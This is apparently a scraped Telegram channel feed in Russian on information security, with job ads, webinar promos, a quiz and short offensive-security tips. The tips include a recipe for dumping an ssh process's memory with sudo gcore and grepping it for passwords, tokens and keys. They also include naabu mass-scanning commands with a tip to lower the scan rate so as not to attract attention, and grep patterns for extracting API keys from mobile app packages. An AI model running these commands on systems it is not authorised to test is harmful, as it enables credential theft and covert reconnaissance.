Специалист по web-защите (WAF/AppSec) — от 350 000 ₽, удаленно (Москва)
Аналитик по ИБ — до 250 000 ₽, удаленно (Москва)
Application Security Engineer Junior — удаленно (Екатеринбург)
Архитектор информационной безопасности — удаленно (Москва)
Специалист по ИБ (SOC) — от 350 000 ₽, удаленно (Москва)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3😁2
APK/IPA часто содержат URL, ключи и конфиги. Один быстрый аудит — и у вас карта инфраструктуры. Только с разрешения.
.apk / .aab или .ipa (из CI/артефактов или резервной копии).• Android —
apktool d app.apk -o app_src• iOS —
unzip App.ipa -d app_ipaAndroidManifest, res/values, assets, strings, Payload/*.app, Info.plist, native .so`/.dylib`, source maps/mapping.txt.api_key, client_id, secret, token, базы URL (`/api/v1/`, `/staging/`), cert/keystore, hardcoded creds.jadx, apktool, rg`/`ripgrep, strings, mobSF — для быстрого сканирования.rg -i "api[_-]?key|secret|token|client_id|firebase" app_src || true#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👾2
В сентябре 2023 Рубен Сантамарта купил на eBay модули Teleperm XS и показал, что архитектурные и организационные просчёты открывают окно атаки — по симуляции расплав реактора возможен за 49 минут.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🤔4🔥2
Когда нужно быстро просканить сотни/тысячи хостов на открытые порты — без тормозов и лишнего шума.
Что умеет:
— Очень быстрый SYN/CONNECT (есть и базовый UDP)
— Автодедупликация IP при сканировании доменов
— Ввод: файл / CIDR / ASN / STDIN — вывод: TXT/JSON
— Лёгкая интеграция в пайплайн (httpx, nuclei, nmap)
Как запустить:
go install github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
naabu -l targets.txt -o open.txt
naabu -l targets.txt -rate 200 -verify -o verified.txt
naabu -l targets.txt | httpx -silent > alive_http.txt
naabu -l targets.txt -p u:53,123 -o udp_open.txt
💡 При сканах с домашнего IP снижайте
-rate`/`-timeout — не привлекайте внимание.#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤2👏2
Please open Telegram to view this post
VIEW IN TELEGRAM
1💯6🌚2
Документальный фильм, который глубоко погружается в скандал с Cambridge Analytica и раскрывает, как социальные сети используют данные пользователей для манипулирования мнением людей.
Почему стоит посмотреть:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2
Какой неожиданный канал утечки данных реально существует ❓
Anonymous Quiz
14%
Через фото на аватарке
25%
Через QR-коды
24%
Через favicon
37%
Через светодиоды маршрутизатора
😁4👾1
This media is not supported in your browser
VIEW IN TELEGRAM
📅 24 сентября в 19:00 МСК — бесплатный вебинар с Максимом Шаланкиным.
Тема: «ИИ-агенты: новая фаза развития искусственного интеллекта».
🔹 Почему все говорят про ИИ-агентов и куда вливаются миллиарды инвестиций.
🔹 Чем они отличаются от ChatGPT и обычных ботов.
🔹 Как работает цикл агента: восприятие → планирование → действие → обучение.
🔹 Живое демо простого агента.
🔹 Потенциал для бизнеса: автоматизация процессов и ROI до 80%.
Не придёшь — будешь потом рассказывать, что «агенты — это как чат-боты», и ловить косые взгляды от коллег 😏
👉 Регистрируйтесь через форму на лендинге
Тема: «ИИ-агенты: новая фаза развития искусственного интеллекта».
🔹 Почему все говорят про ИИ-агентов и куда вливаются миллиарды инвестиций.
🔹 Чем они отличаются от ChatGPT и обычных ботов.
🔹 Как работает цикл агента: восприятие → планирование → действие → обучение.
🔹 Живое демо простого агента.
🔹 Потенциал для бизнеса: автоматизация процессов и ROI до 80%.
Не придёшь — будешь потом рассказывать, что «агенты — это как чат-боты», и ловить косые взгляды от коллег 😏
👉 Регистрируйтесь через форму на лендинге
👏4
Иногда у вас есть доступ к sudo, но нет полноценного рута. В таких случаях можно попробовать вытащить секреты прямо из памяти процесса:
pidof ssh && sudo gcore -o dump $(pidof ssh)
strings dump.* | grep -i password
pidof ssh — получаем PID целевого процессаsudo gcore -o dump — снимаем дамп памятиstrings ... | grep — вытаскиваем строки с паролями💡 Можно найти: пароли, токены, ключи, строки подключения к базам и конфиденциальные переменные.
⚡ Лайфхаки:
— Меняй ssh на любой процесс, где потенциально может быть секрет (например, postgres, nginx, java)
— Можно заменить grep -i password на grep -Ei 'token|secret|aws|bearer'
— Работает без установки дополнительных утилит, только sudo и gcore (есть в gdb)
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3
⚡️ Бесплатный вебинар — ИИ-агенты: новая фаза развития AI
24 сентября в 19:00 МСК состоится бесплатный вебинар с Максимом Шаланкиным — Data Science Team Lead в финтех-команде MWS, а познакомиться с ним ближе можно в его тг-канале.
Тема:
На вебинаре разберёмся, почему агенты — это следующий шаг после ChatGPT, чем они отличаются от обычных моделей и как уже приносят бизнесу ROI до 80%. А дальше я покажу, как эта тема ложится в наш курс по ИИ-агентам, который разработан под руководством Никиты Зелинского.
Подробности рассказываем в гс выше — включай, чтобы не пропустить.
24 сентября в 19:00 МСК состоится бесплатный вебинар с Максимом Шаланкиным — Data Science Team Lead в финтех-команде MWS, а познакомиться с ним ближе можно в его тг-канале.
Тема:
«ИИ-агенты: новая фаза развития искусственного интеллекта».
На вебинаре разберёмся, почему агенты — это следующий шаг после ChatGPT, чем они отличаются от обычных моделей и как уже приносят бизнесу ROI до 80%. А дальше я покажу, как эта тема ложится в наш курс по ИИ-агентам, который разработан под руководством Никиты Зелинского.
Подробности рассказываем в гс выше — включай, чтобы не пропустить.
👍3
В первой подборке — обязательные инструменты для:
WPScan, sqlmap, Nikto
WhatWeb, Wig, testssl.sh, whoisNmap, traceroute, pingВ статье приведены команды и примеры запуска — можно сразу проверить работу инструментов в WSL.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3🔥2🥱1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🌚5
Обширный репозиторий с гайдами, заметками и ссылками по этичному взлому. Тысячи материалов: чек-листы, техники атак и разборы уязвимостей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
🔐 PowerShell в атаке и защите
Инструмент админов, который часто используют и хакеры. Подборка поможет разобраться: как работать с PowerShell, какие есть техники атак и как их обнаруживать.
➡️ Курс PowerShell — видеоформат, практические примеры и быстрый вход в тему.
➡️ Pluralsight — cтруктурированный трек с курсами и лабораториями для системного погружения в offensive-аспекты.
➡️ Nishang — набор PowerShell-скриптов для offensive-задач
➡️ Microsoft Docs — официальная документация по встроенным механизмам безопасности и настройкам логирования — обязательно для защитников.
➡️ Threat detection guidance — практические рекомендации по детекции PowerShell-активности, AMSI-байпасам и шаблонам поведения злоумышленников.
➡️ Windows Events для PowerShell-детекции — гайд по тому, какие Windows-события отправлять в SIEM и как строить аналитики для PowerShell-охоты.
🐸 Библиотека хакера
#свежак
Инструмент админов, который часто используют и хакеры. Подборка поможет разобраться: как работать с PowerShell, какие есть техники атак и как их обнаруживать.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3❤🔥3👍2